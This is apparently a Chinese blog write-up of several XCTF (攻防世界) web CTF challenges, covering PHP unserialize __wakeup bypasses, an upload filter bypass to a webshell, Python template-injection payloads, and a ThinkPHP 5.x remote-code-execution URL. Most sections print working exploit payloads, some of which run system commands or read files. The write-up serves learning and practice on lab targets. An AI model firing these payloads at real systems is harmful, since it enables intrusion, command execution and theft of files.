攻防世界Web进阶区部分writeup

Word count: 986Reading time: 4 min

 2020/02/22   Share

攻防世界Web进阶区部分writeup

因为疫情在家无聊，所以做一下攻防世界的题练练手

¶unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

一看就是反序列化但是当使用 unserialize() 恢复对象时，将调用 __wakeup() 成员函数
之前在做CISCN的时候了解到当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

upload successful

所以payload为?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

¶upload1

有前端的后缀校验
先改成jpg形式抓包再改成php 上传成功

upload successful

放入蚁剑得到flag

upload successful

¶Web_python_template_injection

输入http://111.198.29.45:57604/2

upload successful
存在模版注入

''.__class__.__mro__[2].__subclasses__()
寻找可以调用的函数

upload successful

for item in ''.__class__.__mro__[2].__subclasses__():
	try:
         if 'os' in item.__init__.__globals__:
             print num,item
         num+=1
    except:
        print '-'
        num+=1

找到包含os模块的函数

1	71 <class 'site._Printer'>

这个包含os模块
得到payload

1	''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')

upload successful
发现可能无法执行system函数
但是os模块里还有另外一个函数可以列目录 listdir

1	{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

upload successful

直接调用第40个file函数读取flag即可

1	{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

upload successful

¶Web_php_unserialize

得到源代码

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

又是反序列化的题目
这里依然要绕过__wakeup 方法和上题一样
还要绕过preg_match匹配这里是不能出现O:4这样的类型
绕过的方法就是把4变成+4
payload
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

¶php_rce

这个是运用thinkphp5.x rce的exp
index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

upload successful

改一下payload就来了
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

¶ics-06

简单题

查看源代码发现有index.php

upload successful

id可以传参用bp爆破到2333拿到flag
##warmup
右键源代码发现source.php

upload successful
跟进拿到源码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>